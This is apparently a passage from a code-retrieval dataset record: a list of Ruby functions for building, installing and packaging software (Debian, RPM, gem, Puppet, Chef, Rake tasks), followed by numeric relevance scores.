extra_index_url_args << find_links_url_args << target_args\n safesystem(*pip_args.flatten)\n\n if attributes[:virtualenv_setup_install?]\n logger.info(\"Running PACKAGE setup.py\")\n setup_args = [python_exe, \"setup.py\", \"install\"]\n safesystem(*setup_args.flatten)\n end\n\n if ! is_requirements_file && package_version.nil?\n frozen = safesystemout(python_exe, pip_exe, \"freeze\")\n frozen_version = frozen[/#{package}==[^=]+$/]\n package_version = frozen_version && frozen_version.split(\"==\")[1].chomp!\n self.version ||= package_version\n end\n\n ::Dir[build_path + \"/**/*\"].each do |f|\n if ! File.readable? 
f\n File.lchmod(File.stat(f).mode | 444)\n end\n end\n\n ::Dir.chdir(virtualenv_build_folder) do\n safesystem(\"virtualenv-tools\", \"--update-path\", virtualenv_folder)\n end\n\n if !attributes[:virtualenv_other_files_dir].nil?\n # Copy all files from other dir to build_path\n Find.find(attributes[:virtualenv_other_files_dir]) do |path|\n src = path.gsub(/^#{attributes[:virtualenv_other_files_dir]}/, '')\n dst = File.join(build_path, src)\n copy_entry(path, dst, preserve=true, remove_destination=true)\n copy_metadata(path, dst)\n end\n end\n\n remove_python_compiled_files virtualenv_build_folder\n\n # use dir to set stuff up properly, mainly so I don't have to reimplement\n # the chdir/prefix stuff special for tar.\n dir = convert(FPM::Package::Dir)\n # don't double prefix the files\n dir.attributes[:prefix] = nil\n if attributes[:chdir]\n dir.attributes[:chdir] = File.join(build_path, attributes[:chdir])\n else\n dir.attributes[:chdir] = build_path\n end\n\n cleanup_staging\n # Tell 'dir' to input \".\" and chdir/prefix will help it figure out the\n # rest.\n dir.input(\".\")\n @staging_path = dir.staging_path\n dir.cleanup_build\n\n end",
"def initialize_package\n self.need_tar ||= false\n self.need_zip ||= false\n end",
"def install\n pacman \"--noconfirm\", \"--noprogressbar\", \"-Sy\", @resource[:name]\n\n unless self.query\n raise Puppet::ExecutionFailure.new(\"Could not find package %s\" % self.name)\n end\n end",
"def with_package_source(source_url, source_repos = [], options = {})\n source_prefix = options[:source] ? 'deb-src' : 'deb'\n source_patterns = [source_prefix, source_url] + source_repos \n \n source_contents = File.read '/etc/apt/sources.list'\n sources = source_contents.split(/(\\r|\\n)+/)\n source_exists = sources.any? do |source_line|\n source_frags = source_line.split(' ')\n source_patterns.all? { |pattern| source_frags.any? { |frag| frag == pattern } }\n end\n\n unless source_exists\n File.open('/etc/apt/sources.list', 'a') do |f|\n f.write \"#{source_prefix} #{source_url} #{source_repos.join(' ')}\\n\"\n end\n update_package_metadata\n end\n \n begin\n yield\n ensure\n unless source_exists\n File.open('/etc/apt/sources.list', 'w') { |f| f.write source_contents }\n update_package_metadata \n end\n end\n end",
"def install_custom!\n do_dmg_package_resource!\n end",
"def after_package_create(package)\n end",
"def after_package_create(package)\n end",
"def package(name)\n if name.respond_to? :cache_path\n name\n elsif @versions[name]\n Package.for(@sources[name], @versions[name], @files[name])\n end\n end",
"def install_package host, package_name, package_version = nil\n host.install_package package_name, '', package_version\n end",
"def packaging\n compiler && @compiler.class.packaging\n end",
"def add_bundle(sourcefile, params={})\n classname = File.basename(sourcefile, \".java\")\n pkgline = `grep ^package #{sourcefile}`\n if !pkgline or pkgline == \"\"\n raise \"the searcher file (#{sourcefile}) must contain a package declaration\"\n end\n pkgpath = pkgline.split()[1].chop;\n add_bundle_dir(sourcefile, pkgpath + \".\" + classname, params)\n end",
"def action_package(type)\n name = prompt('Name : ')\n dest = Automation::Converter.to_unix_path(prompt('Destination : '))\n require REQUIRE_MAP[type] % {name: name}\n\n raise Automation::ConsoleError.new(\"No definition found for package '#{name}'\") unless PACKAGE_CLASS.has_key?(name)\n plugin = PACKAGE_CLASS[name].new\n plugin.package(dest)\n puts \"Packaged '#{type}' - #{plugin.name}\"\n end",
"def package_by_name(package_name)\n raise RuntimeError, \"#{self.class} needs to overwrite package_by_name\"\n end",
"def package_from_name\n case name.downcase\n when 'splunk' then package :splunk\n when 'universal_forwarder' then package :universal_forwarder\n else raise 'Package must be specified (:splunk or :universal_forwarder)'\n end\n end",
"def upgrade_package(package_name, options = {})\n return install_package(package_name, options) if options[:source]\n \n return true if upgrade_package_impl(package_name, options)\n \n return false if options[:no_proxy]\n upgrade_package package_name, options.merge(:no_proxy => true)\n end",
"def package_project(source, dest)\n FileUtils.mkdir_p(dest)\n FileUtils.cp(File.join(source, BUILDFILE), File.join(dest, BUILDFILE))\n PACKAGE_FILES.each do |file|\n cp_if_exists(File.join(source, file), dest)\n end\n rules = @project_config.publish_rules.empty? ? PUBLISH_RULES : @project_config.publish_rules\n\n rules.each do |from, to|\n log.debug \"Processing rule #{from} => #{to}\"\n cp_if_exists(File.join(source, from), File.join(dest, to))\n end\n end",
"def pkg_install\n return if @install.count == 0\n\n sysprint \"#{@name} install\"\n\n if @install[:bsys_install] != nil\n if @bsdstyle == true\n FileUtils::cd(@srcdir)\n else\n FileUtils::cd(@objdir)\n end\n\n unless sysexec(@install[:bsys_install])\n syserr \"Failed to install package\"\n raise\n end\n\n FileUtils::cd(BSYS_ROOTDIR)\n\n @install.delete(:bsys_install)\n end\n\n @install.each_pair do |src, dst|\n dst = File::join($project_rootdir, dst)\n if File::directory? src\n FileUtils::mkdir_p dst\n continue\n end\n\n # Create directory if it doesn't exists\n FileUtils::mkdir_p dst[0..-(File::basename(dst).length + 1)]\n\n if File::executable? src\n FileUtils::install(src, dst, :mode => 0755)\n else\n FileUtils::install(src, dst, :mode => 0644)\n end\n end\n end",
"def define\n fail \"Version required (or :noversion)\" if @version.nil?\n @version = nil if :noversion == @version\n\n desc \"Build all the packages\"\n task :package\n\n desc \"Force a rebuild of the package files\"\n task repackage: [:clobber_package, :package]\n\n desc \"Remove package products\"\n task :clobber_package do\n rm_r package_dir rescue nil\n end\n\n task clobber: [:clobber_package]\n\n [\n [need_tar, tgz_file, \"z\"],\n [need_tar_gz, tar_gz_file, \"z\"],\n [need_tar_bz2, tar_bz2_file, \"j\"],\n [need_tar_xz, tar_xz_file, \"J\"]\n ].each do |need, file, flag|\n if need\n task package: [\"#{package_dir}/#{file}\"]\n file \"#{package_dir}/#{file}\" =>\n [package_dir_path] + package_files do\n chdir(working_dir) { sh @tar_command, \"#{flag}cvf\", file, target_dir }\n mv \"#{package_dir_path}/#{target_dir}\", package_dir if without_parent_dir\n end\n end\n end\n\n if need_zip\n task package: [\"#{package_dir}/#{zip_file}\"]\n file \"#{package_dir}/#{zip_file}\" =>\n [package_dir_path] + package_files do\n chdir(working_dir) { sh @zip_command, \"-r\", zip_file, target_dir }\n mv \"#{package_dir_path}/#{zip_file}\", package_dir if without_parent_dir\n end\n end\n\n directory package_dir_path => @package_files do\n @package_files.each do |fn|\n f = File.join(package_dir_path, fn)\n fdir = File.dirname(f)\n mkdir_p(fdir) unless File.exist?(fdir)\n if File.directory?(fn)\n mkdir_p(f)\n else\n rm_f f\n safe_ln(fn, f)\n end\n end\n end\n self\n end",
"def preinst\n @package.get_script :preinst\n end",
"def run_package_for_missing(bundle_info)\n puts 'Packaging dependencies missing for current platform'\n\n $usePrecompiled = true\n\n puts 'Making sure databases are loaded...'\n databases = getDefaultDatabases\n\n if databases\n success 'Databases loaded'\n else\n onError 'database loading failed'\n end\n\n to_package = []\n\n all_dependencies.each do |dep|\n puts \"Checking dependency: #{dep.Name}\"\n\n precompiled = getSupportedPrecompiledPackage dep\n\n next if precompiled\n\n puts 'No precompiled available. Creating package'\n\n to_package.append dep\n end\n\n if to_package.empty?\n success 'No missing precompiled dependencies found'\n return\n end\n\n package_dependencies to_package, bundle_info\nend",
"def install(pkg_name)\n begin\n pkg_build_dir = packaging_dir(pkg_name)\n filepath = Dir.glob(\"#{pkg_build_dir}/*.deb\")\n if filepath.size < 1\n raise RuntimeError, \"No debian file found for #{pkg_name} in #{pkg_build_dir}: #{filepath}\"\n elsif filepath.size > 1\n raise RuntimeError, \"More than one debian file available in #{pkg_build_dir}: #{filepath}\"\n else\n filepath = filepath.first\n Packager.info \"Found package: #{filepath}\"\n end\n install_debfile(filepath)\n rescue Exception => e\n raise RuntimeError, \"Installation of package '#{pkg_name} failed -- #{e}\"\n end\n end",
"def load_package_manifest(pkg)\n if pkg.respond_to?(:to_str)\n pkg_definition = find_package_definition(pkg)\n unless pkg_definition\n raise ArgumentError, \"#{pkg} is not a known package in #{self}\"\n end\n\n pkg = pkg_definition\n end\n package = pkg.autobuild\n package_set = pkg.package_set\n\n # Look for the package's manifest.xml, but fallback to a manifest in\n # the package set if present\n if package.use_package_xml? && package.checked_out?\n manifest_path = File.join(package.srcdir, \"package.xml\")\n raise NoPackageXML.new(package.srcdir), \"#{package.name} from \"\\\n \"#{package_set.name} has use_package_xml set, but the package has \"\\\n \"no package.xml file\" unless File.file?(manifest_path)\n\n manifest = PackageManifest.load(package, manifest_path,\n ros_manifest: true,\n condition_context: @ws.env)\n else\n manifest_paths = [File.join(package.srcdir, \"manifest.xml\")]\n if package_set.local_dir\n manifest_paths << File.join(\n package_set.local_dir, \"manifests\", \"#{package.name}.xml\"\n )\n end\n manifest_path = manifest_paths.find do |path|\n File.file?(path)\n end\n if manifest_path\n manifest = PackageManifest.load(package, manifest_path,\n ros_manifest: false,\n condition_context: @ws.config)\n end\n end\n\n if manifest\n pkg.autobuild.description = manifest\n else\n Autoproj.warn \"#{package.name} from #{package_set.name} \"\\\n \"does not have a manifest\"\n end\n\n pkg.apply_dependencies_from_manifest\n # #description is initialized with a null package manifest\n # return it even if we haven't overriden it\n pkg.autobuild.description\n end",
"def generate_package\n if @language_package_service.autograded?\n new_package = @language_package_service.generate_package(@question.attachment)\n @question.file = new_package if new_package.present?\n else\n templates = @language_package_service.submission_templates\n @question.imported_attachment = nil\n @question.import_job_id = nil\n @question.non_autograded_template_files = templates.map do |template|\n Course::Assessment::Question::ProgrammingTemplateFile.new(template)\n end\n end\n end",
"def copy_package(package, package_path)\n repository_path = File.join(@git_resolver.repository_path(package), '.')\n\n FileUtils.mkdir_p(package_path)\n FileUtils.cp_r(repository_path, package_path)\n FileUtils.rm_rf(File.join(package_path, '.git'))\n end",
"def set_package_filename\n if @package_name.nil?\n @package_name = get_package_name\n end\n end",
"def do_dmg_package_resource!\n dmg_package 'Chef Development Kit' do\n app dmg_package_app\n volumes_dir 'Chef Development Kit'\n source dmg_package_source\n type 'pkg'\n package_id 'com.getchef.pkg.chefdk'\n checksum dmg_package_checksum\n end\n end",
"def compile_package_task(input, output=input)\n js_tasks = SproutCore::Compiler::Preprocessors::JavaScriptTask.with_input \"packages/#{input}/lib/**/*.js\", \".\"\n SproutCore::Compiler::CombineTask.with_tasks js_tasks, \"#{SproutCore::Compiler.intermediate}/#{output}\"\nend",
"def compile_package_task(input, output=input)\n js_tasks = SproutCore::Compiler::Preprocessors::JavaScriptTask.with_input \"packages/#{input}/lib/**/*.js\", \".\"\n SproutCore::Compiler::CombineTask.with_tasks js_tasks, \"#{SproutCore::Compiler.intermediate}/#{output}\"\nend",
"def fetch_and_deploy_from local_filename\n if local_filename.end_with?('.tsv')\n logger.info \"Deploying contents of config file: #{local_filename}\"\n process_config_file local_filename\n\n elsif local_filename.end_with?('.gz')\n Chef::Log.info \"Deploying R package: #{local_filename}\"\n execute \"install custom R package #{local_filename}\" do\n command \"R CMD INSTALL #{local_filename}\"\n end\n\n elsif local_filename.end_with?('.deb')\n Chef::Log.info \"Deploying Debian package: #{local_filename}\"\n package_base = Regexp.new(\".*/([^/]+)_([^_/]+)\\.deb$\").match(local_filename)[1]\n dpkg_package \"#{package_base}\" do\n action :install\n source local_filename\n end\n end\n end",
"def install\n bin.install \"#{PACKAGE_NAME}\"\n end",
"def pkg_cmd; \"#{pkg_binary}\" end",
"def add_packaged_app(&block)\n raise Tay::InvalidSpecification.new('Packaged app already set up') if @packaged_app\n @packaged_app = PackagedApp.new\n yield @packaged_app\n end",
"def metapackage(name, *packages)\n Autoproj.workspace.manifest.metapackage(name, *packages)\nend",
"def package(name, paths=[])\n Package.new(name, paths, self)\n end",
"def import(package)\n srcdir = package.srcdir\n if File.directory?(srcdir)\n package.isolate_errors(false) do\n if Autobuild.do_update\n perform_update(package)\n else\n if Autobuild.verbose\n puts \" not updating #{package.name}\"\n end\n return\n end\n end\n\n elsif File.exists?(srcdir)\n raise ConfigException, \"#{srcdir} exists but is not a directory\"\n else\n perform_checkout(package)\n end\n end",
"def package_if_necessary(pkg)\n if !package_is_installed?(pkg)\n banner \"#{pkg}...\"\n run \"apt-get -y install #{pkg}\"\n end\n end",
"def package(group_name, package_name, package_version)\n RubyAem::Resources::Package.new(@client, group_name, package_name, package_version)\n end",
"def register_package_set(pkg_set)\n invalidate_ignored_package_names\n metapackage(pkg_set.name)\n metapackage(\"#{pkg_set.name}.all\")\n @package_sets << pkg_set\n end",
"def build(chroot,dirs,task,add_to_autoreq=true,snapshot_release=false)\n validate_in_mock_group?\n _verbose = ENV.fetch('SIMP_PKG_verbose','no') == 'yes'\n\n # Default package metadata for reference\n default_metadata = YAML.load(File.read(\"#{@src_dir}/build/package_metadata_defaults.yaml\"))\n\n metadata = Parallel.map(\n # Allow for shell globs\n Array(dirs),\n :in_processes => get_cpu_limit,\n :progress => task.name\n ) do |dir|\n result = []\n\n fail(\"Could not find directory #{dir}\") unless Dir.exist?(dir)\n\n Dir.chdir(dir) do\n built_rpm = false\n unique_build = (get_cpu_limit != 1).to_s\n\n if _verbose\n $stderr.puts(\"Running 'rake pkg:rpm' on #{File.basename(dir)}\")\n end\n\n # We're building a module, override anything down there\n if File.exist?('metadata.json')\n unique_namespace = (0...24).map{ (65 + rand(26)).chr }.join.downcase\n\n Simp::Rake::Pkg.new(Dir.pwd, nil, unique_namespace, @simp_version)\n\n Rake::Task[\"#{unique_namespace}:pkg:rpm\"].invoke(chroot, unique_build, snapshot_release)\n\n built_rpm = true\n\n # We're building one of the extra assets and should honor its Rakefile\n elsif File.exist?('Rakefile')\n\n rake_flags = Rake.application.options.trace ? '--trace' : ''\n\n cmd = %{SIMP_BUILD_version=#{@simp_version} rake pkg:rpm[#{chroot},#{unique_build},#{snapshot_release}] #{rake_flags} 2>&1}\n\n build_success = true\n begin\n ::Bundler.with_clean_env do\n %x{#{cmd}}\n build_success = $?.success?\n end\n\n built_rpm = true\n rescue\n build_success = false\n end\n\n unless build_success\n if _verbose\n $stderr.puts(\"First 'rake pkg:rpm' attempt failed, running bundle and trying again.\")\n end\n\n ::Bundler.with_clean_env do\n %x{bundle install --with development}\n %x{#{cmd}}\n end\n end\n else\n puts \"Warning: '#{dir}' could not be built via Rake\"\n end\n\n if built_rpm\n tarballs = Dir.glob('dist/*.tar.gz')\n srpms = Dir.glob('dist/*.src.rpm')\n rpms = (Dir.glob('dist/*.rpm') - srpms)\n\n # Not all items generate tarballs\n tarballs.each do |pkg|\n if (File.stat(pkg).size == 0)\n raise(\"Empty Tarball '#{pkg}' generated for #{dir}\")\n end\n end\n raise(\"No SRPMs generated for #{dir}\") if srpms.empty?\n raise(\"No RPMs generated for #{dir}\") if rpms.empty?\n\n last_build = {\n 'git_hash' => %x{git show-ref --head HEAD}.chomp,\n 'rpms' => {}\n }\n\n # Glob all generated rpms, and add their metadata to a result array.\n rpms.each do |rpm|\n # get_info from each generated rpm, not the spec file, so macros in the\n # metadata have already been resolved in the mock chroot.\n metadata = Simp::RPM.get_info(rpm)\n\n if File.exist?('build/package_metadata.yaml')\n metadata.merge!(YAML.load_file('build/package_metadata.yaml'))\n end\n\n rpm_stat = File.stat(rpm)\n\n last_build['rpms'][rpm] = {\n 'metadata' => metadata,\n 'size' => rpm_stat.size\n }\n\n result << metadata\n end\n\n File.open('dist/.last_build_metadata', 'w') do |fh|\n fh.puts(last_build.to_yaml)\n end\n end\n\n if _verbose\n $stderr.puts(\"Finshed 'rake pkg:rpm' on #{File.basename(dir)}\")\n end\n end\n\n result\n end\n\n metadata.each do |mod|\n # Each module could generate multiple rpms, each with its own metadata.\n # Iterate over them to add all built rpms to autorequires.\n mod.each do |module_pkginfo|\n next unless (module_pkginfo && module_pkginfo.is_a?(Hash))\n\n # Set up the autorequires\n if add_to_autoreq\n # Register the package with the autorequires\n mode = 'r+'\n mode = 'w+' unless File.exist?(\"#{@src_dir}/build/autorequires\")\n autoreq_fh = 
File.open(\"#{@src_dir}/build/autorequires\",mode)\n\n begin\n # Reads the autorequires file, then empties it\n autorequires = []\n autorequires += autoreq_fh.read.split(\"\\n\")\n autoreq_fh.rewind\n autoreq_fh.truncate(0)\n\n # The SIMP Rakefile expects the autorequires to be in this format.\n autorequires << \"#{module_pkginfo[:name]} #{module_pkginfo[:version]} #{module_pkginfo[:release]}\"\n autoreq_fh.puts(autorequires.sort.uniq.join(\"\\n\"))\n ensure\n autoreq_fh.flush\n autoreq_fh.close\n end\n end\n end\n end\n end",
"def install!\n include_recipe 'zypper'\n super\n end",
"def solaris_install_local_package(package_path, noask_directory = nil)\n variant, version, arch, codename = self['platform'].to_array\n\n version = version.split('.')[0] # packages are only published for major versions\n\n error_message = nil\n unless variant == 'solaris'\n error_message = \"Can not call solaris_install_local_package for the \"\n error_message << \"non-solaris platform '#{variant}'\"\n end\n if version != '10' && version != '11'\n error_message = \"Solaris #{version} is not supported by the method \"\n error_message << 'solaris_install_local_package'\n end\n raise ArgumentError, error_message if error_message\n\n if version == '10'\n noask_text = self.noask_file_text\n create_remote_file self, File.join(noask_directory, 'noask'), noask_text\n\n install_cmd = \"gunzip -c #{package_path} | pkgadd -d /dev/stdin -a noask -n all\"\n elsif version == '11'\n install_cmd = \"pkg install -g #{package_path} puppet-agent\"\n end\n self.exec(Beaker::Command.new(install_cmd))\n end",
"def run_package_installation_test(hash)\n # Turn the hash into a package\n if files = hash[:files]\n hash.delete(:files)\n if files.is_a?(Array)\n hash[:source] = files.shift\n else\n hash[:source] = files\n files = []\n end\n else\n files = []\n end\n\n if versions = hash[:versions]\n hash.delete(:versions)\n else\n versions = []\n end\n\n # Start out by just making sure it's installed\n if versions.empty?\n hash[:ensure] = :present\n else\n hash[:ensure] = versions.shift\n end\n\n if hash[:source]\n unless FileTest.exists?(hash[:source])\n $stderr.puts \"Create a package at #{hash[:source]} for testing\"\n return\n end\n end\n\n if cleancmd = hash[:cleanup]\n hash.delete(:cleanup)\n end\n\n pkg = nil\n assert_nothing_raised(\n \"Could not turn #{hash.inspect} into a package\"\n ) do\n pkg = Puppet::Type.newpackage(hash)\n end\n\n # Make any necessary modifications.\n modpkg(pkg)\n\n provider = pkg.provider\n\n assert(provider, \"Could not retrieve provider\")\n\n return if result = provider.query and ! [:absent, :purged].include?(result[:ensure])\n\n assert_absent(provider)\n\n if Process.uid != 0\n Puppet.info \"Run as root for full package tests\"\n return\n end\n\n cleanup do\n if pkg.provider.respond_to?(:uninstall)\n pkg.provider.flush\n if pkg.provider.properties[:ensure] != :absent\n assert_nothing_raised(\"Could not clean up package\") do\n pkg.provider.uninstall\n end\n end\n else\n system(cleancmd) if cleancmd\n end\n end\n\n # Now call 'latest' after the package is installed\n if provider.respond_to?(:latest)\n assert_nothing_raised(\"Could not call 'latest'\") do\n provider.latest\n end\n end\n\n assert_nothing_raised(\"Could not install package\") do\n provider.install\n end\n\n assert_not_absent(provider, \"package did not install\")\n\n # If there are any remaining files, then test upgrading from there\n unless files.empty?\n pkg[:source] = files.shift\n current = provider.properties\n assert_nothing_raised(\"Could not upgrade\") do\n provider.update\n end\n provider.flush\n new = provider.properties\n assert(current != new, \"package was not upgraded: #{current.inspect} did not change\")\n end\n\n unless versions.empty?\n pkg[:ensure] = versions.shift\n current = provider.properties\n assert_nothing_raised(\"Could not upgrade\") do\n provider.update\n end\n provider.flush\n new = provider.properties\n assert(current != new, \"package was not upgraded: #{current.inspect} did not change\")\n end\n\n # Now call 'latest' after the package is installed\n if provider.respond_to?(:latest)\n assert_nothing_raised(\"Could not call 'latest'\") do\n provider.latest\n end\n end\n\n # Now remove the package\n if provider.respond_to?(:uninstall)\n assert_nothing_raised do\n provider.uninstall\n end\n\n assert_absent(provider)\n end\n end",
"def install_packages(app)\n\n `installer -pkg \"#{app}\" -target /`\n\nend",
"def package_dir\r\n \"${0%/#{target_name}}\"\r\n end",
"def build_package_tasks(config)\n # The name of the task to build the package\n package_task_name = \"build_#{config[:package_name]}\"\n\n # Add task name to the list of dependencies for the :deb_packages task\n task :deb_packages => package_task_name\n\n # The path to the package source directory\n pkg_src_dir = File.join(PACKAGE_CONSTRUCTION_DIR, source_dir_name(config))\n\n # Directory task to ensure the existence of the directory\n directory pkg_src_dir\n\n # Create the tarball task\n orig_source_tarball_path = File.join(PACKAGE_CONSTRUCTION_DIR, \"#{orig_tar_ball_name(config)}.orig.tar.gz\")\n\n # The File task to construct the original source tarball.\n file orig_source_tarball_path => PACKAGE_CONSTRUCTION_DIR do\n system \"tar zcf #{orig_source_tarball_path} --directory #{PACKAGE_CONSTRUCTION_DIR} #{source_dir_name(config)}\"\n end\n\n # The path to the debian directory within the extracted source directory\n package_debian_path = File.join(pkg_src_dir, 'debian')\n\n # Directory task to the package debian path to ensure existence.\n directory package_debian_path\n\n # The task that actually constructs the debian package\n task package_task_name => orig_source_tarball_path do\n # Build the spanky little thing.\n debuild_flag = ENV['debuild'] || 'true'\n if debuild_flag == 'true'\n system \"cd #{pkg_src_dir}; debuild -us -uc\"\n else\n puts \"Skipping build; debug flag was set\"\n end\n end\n\n # Ensure we have set up the tasks for all the files to be included\n # in the package.\n config[:exes].each do | exe_name |\n exe_path = File.join(pkg_src_dir, exe_name.split('.').first)\n file exe_path => pkg_src_dir do\n cp exe_name, exe_path\n end\n\n # Add the file path as a dependency of the source tarball\n task orig_source_tarball_path => exe_path\n end\n\n # Create the task to populate the debian directory\n debian_task = \"populate_#{config[:package_name]}_debian_files\"\n task debian_task => package_debian_path do\n cp_r \"package_source/#{config[:package_name]}/debian\", pkg_src_dir\n end\n\n # Finally add the debian task as a dependency for the package task.\n task package_task_name => debian_task\nend"
] | [
"0.67403233",
"0.6588731",
"0.6479387",
"0.64547145",
"0.6374927",
"0.63533336",
"0.6345991",
"0.6284882",
"0.6275911",
"0.6258917",
"0.6255152",
"0.62313044",
"0.6127586",
"0.60981727",
"0.60876894",
"0.6075155",
"0.6019445",
"0.60131645",
"0.6012386",
"0.6005589",
"0.59925354",
"0.598323",
"0.5958461",
"0.5953497",
"0.59472716",
"0.5946499",
"0.5946499",
"0.5937773",
"0.5908378",
"0.58981377",
"0.58977807",
"0.584224",
"0.5818885",
"0.57706636",
"0.57697517",
"0.5767181",
"0.57662034",
"0.57551885",
"0.57523924",
"0.5738916",
"0.57187814",
"0.5716911",
"0.57095456",
"0.5707998",
"0.5706092",
"0.56980324",
"0.569795",
"0.56874716",
"0.5679009",
"0.56729686",
"0.5667155",
"0.56608903",
"0.565118",
"0.56499326",
"0.564815",
"0.56474227",
"0.5647127",
"0.56398004",
"0.5638373",
"0.56251585",
"0.5615332",
"0.5615332",
"0.56121695",
"0.5611838",
"0.5610157",
"0.5602549",
"0.5598671",
"0.5594562",
"0.5568986",
"0.5563465",
"0.55597645",
"0.5552235",
"0.55508703",
"0.55485547",
"0.5535426",
"0.5533443",
"0.55298537",
"0.5526186",
"0.5517258",
"0.5491386",
"0.5488786",
"0.5479365",
"0.5479365",
"0.54671293",
"0.5462911",
"0.54582983",
"0.5452689",
"0.5446991",
"0.5441864",
"0.54397714",
"0.5438533",
"0.543769",
"0.54330707",
"0.5432998",
"0.5426078",
"0.54258835",
"0.5423899",
"0.542253",
"0.5417488",
"0.5414257"
] | 0.61835426 | 12 |
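The record below pairs a doc-comment query with the `package_meta` method as its positive document. For orientation, here is a minimal usage sketch; the `Apaka::Packaging::Debian` receiver, its constructor call, and the package names are illustrative assumptions, not values taken from this dataset.

    # Hypothetical driver for the package_meta method shown in the record below.
    # Distribution and architecture fall back to the target platform defaults
    # when not supplied.
    packager = Apaka::Packaging::Debian.new        # assumed constructor
    packager.package_meta(
      "rock-base",                                 # meta package name
      ["base/types", "base/cmake"],                # packages the meta package depends on
      version: "0.1",
      force_update: true                           # remove a stale packaging dir first
    )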
Package the given meta package; if an existing source directory is given, this will be used for packaging, otherwise the package will be bootstrapped | def package_meta(name, depend,
version: "0.1",
force_update: false,
distribution: nil,
architecture: nil)
debian_pkg_name = debian_meta_name(name)
if force_update
dirname = packaging_dir(debian_pkg_name)
if File.directory?(dirname)
Packager.info "Debian: rebuild requested -- removing #{dirname}"
FileUtils.rm_rf(dirname)
end
end
distribution ||= target_platform.distribution_release_name
architecture ||= target_platform.architecture
packaging_dir = packaging_dir(debian_pkg_name)
if not File.directory?(packaging_dir)
FileUtils.mkdir_p packaging_dir
end
package_deb_meta(name, depend,
version: version,
distribution: distribution,
packaging_dir: packaging_dir)
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def package\n unless @package\n @package = package_resource_class.new(download_dest, run_context)\n tailor_package_to_platform\n end\n @package\n end",
"def source_package(options)\n package_common(options) do |pkg|\n pkg.srcdir = pkg.name\n yield(pkg) if block_given?\n end\nend",
"def package(output_dir = Pathname(Dir.pwd).expand_path)\n # Check the source\n check_source!\n # Turn the source into component parts to build a gem out of\n gem_parts = read_source_parts\n # Write these parts to a directory\n gem_dir = write_gem_dir(gem_parts)\n # Build a .gem file from this directory, and leave it in the `output_dir`\n build_package(gem_dir, output_dir)\n end",
"def package_plugin(name)\n `cd #{@repository_path}; rake feather:package path=#{name} target=#{@build_path}`\n end",
"def install_package(target_package_path); raise NotImplementedError; end",
"def setup_package(package_name, &block)\n if !block\n raise ConfigError.new, \"you must give a block to #setup_package\"\n end\n\n package_definition = Autoproj.workspace.manifest.package(package_name)\n if !package_definition\n raise ConfigError.new, \"#{package_name} is not a known package\"\n elsif package_definition.autobuild.kind_of?(Autobuild::DummyPackage)\n # Nothing to do!\n else\n package_definition.add_setup_block(block)\n end\nend",
"def package(pkg, options = Hash.new)\n\n options, unknown_options = Kernel.filter_options options,\n :force_update => false,\n :existing_source_dir => nil,\n :patch_dir => nil\n\n if options[:force_update]\n dirname = File.join(OBS_BUILD_DIR, debian_name(pkg))\n if File.directory?(dirname)\n Packager.info \"Debian: rebuild requested -- removing #{dirname}\"\n FileUtils.rm_rf(dirname)\n end\n end\n\n prepare_source_dir(pkg, options)\n\n if pkg.kind_of?(Autobuild::CMake) || pkg.kind_of?(Autobuild::Autotools)\n package_deb(pkg, options)\n elsif pkg.kind_of?(Autoproj::RubyPackage)\n package_ruby(pkg, options)\n else\n raise ArgumentError, \"Debian: Unsupported package type #{pkg.class} for #{pkg.name}\"\n end\n end",
"def bundle_package(*args, &block)\n ruby_package(*args) do |pkg|\n Autoproj.env_add_path 'ROCK_BUNDLE_PATH', pkg.srcdir\n if block_given?\n pkg.instance_eval(&block)\n end\n end\nend",
"def build\n @model.custom_package? ? custom_package : standard_package\n end",
"def package(pkginfo, options = Hash.new)\n options, unknown_options = Kernel.filter_options options,\n :force_update => false,\n :patch_dir => nil,\n :distribution => nil, # allow to override global settings\n :architecture => nil\n\n options[:distribution] ||= target_platform.distribution_release_name\n options[:architecture] ||= target_platform.architecture\n\n debian_pkg_name = debian_name(pkginfo)\n\n if options[:force_update]\n dirname = packaging_dir(pkginfo)\n if File.directory?(dirname)\n Packager.info \"Debian: rebuild requested -- removing #{dirname}\"\n FileUtils.rm_rf(dirname)\n end\n end\n\n options[:packaging_dir] = packaging_dir(pkginfo)\n options[:release_name] = rock_release_name\n\n begin\n # Set the current pkginfo to set the install directory\n # correctly\n # FIXME: needs to be refactored\n #\n @packager_lock.lock\n @current_pkg_info = pkginfo\n\n pkginfo = prepare_source_dir(pkginfo, options.merge(unknown_options))\n\n if pkginfo.build_type == :orogen || pkginfo.build_type == :cmake || pkginfo.build_type == :autotools\n package_default(pkginfo, options)\n elsif pkginfo.build_type == :ruby\n # Import bundles since they do not need to be build and\n # they do not follow the typical structure required for gem2deb\n if pkginfo.name =~ /bundles/\n package_importer(pkginfo, options)\n else\n package_ruby(pkginfo, options)\n end\n elsif pkginfo.build_type == :archive_importer || pkginfo.build_type == :importer_package\n package_importer(pkginfo, options)\n else\n raise ArgumentError, \"Debian: Unsupported package type #{pkginfo.build_type} for #{pkginfo.name}\"\n end\n ensure\n @current_pkg_info = nil\n @packager_lock.unlock\n end\n end",
"def install_custom!\n package package_name do\n source new_resource.source.to_s\n checksum new_resource.checksum unless new_resource.checksum.nil?\n end\n end",
"def package_ruby(pkg, options) \n # update dependencies in any case, i.e. independant if package exists or not\n deps = dependencies(pkg)\n Dir.chdir(pkg.srcdir) do\n begin\n logname = \"obs-#{pkg.name.sub(\"/\",\"-\")}\" + \"-\" + Time.now.strftime(\"%Y%m%d-%H%M%S\").to_s + \".log\"\n gem = FileList[\"pkg/*.gem\"].first\n if not gem \n Packager.info \"Debian: creating gem from package #{pkg.name}\"\n if !system(\"rake gem 2> #{File.join(OBS_LOG_DIR, logname)}\")\n raise \"Debian: failed to create gem from RubyPackage #{pkg.name}\"\n Packager.warn \" check: #{File.expand_path(logname)}\"\n end\n end\n\n gem = FileList[\"pkg/*.gem\"].first\n\n # Make the naming of the gem consistent with the naming schema of\n # rock packages\n #\n # Make sure the gem has the fullname, e.g.\n # tools-metaruby instead of just metaruby\n gem_rename = gem.sub(basename(pkg.name), canonize(pkg.name))\n if gem != gem_rename\n Packager.info \"Debian: renaming #{gem} to #{gem_rename}\"\n FileUtils.mv gem, gem_rename\n gem = gem_rename\n end\n\n Packager.debug \"Debian: copy #{gem} to #{packaging_dir(pkg)}\"\n FileUtils.cp gem, packaging_dir(pkg)\n gem_final_path = File.join(packaging_dir(pkg), File.basename(gem))\n\n # Prepare injection of dependencies\n options[:deps] = deps\n convert_gem(gem_final_path, options)\n # register gem with the correct naming 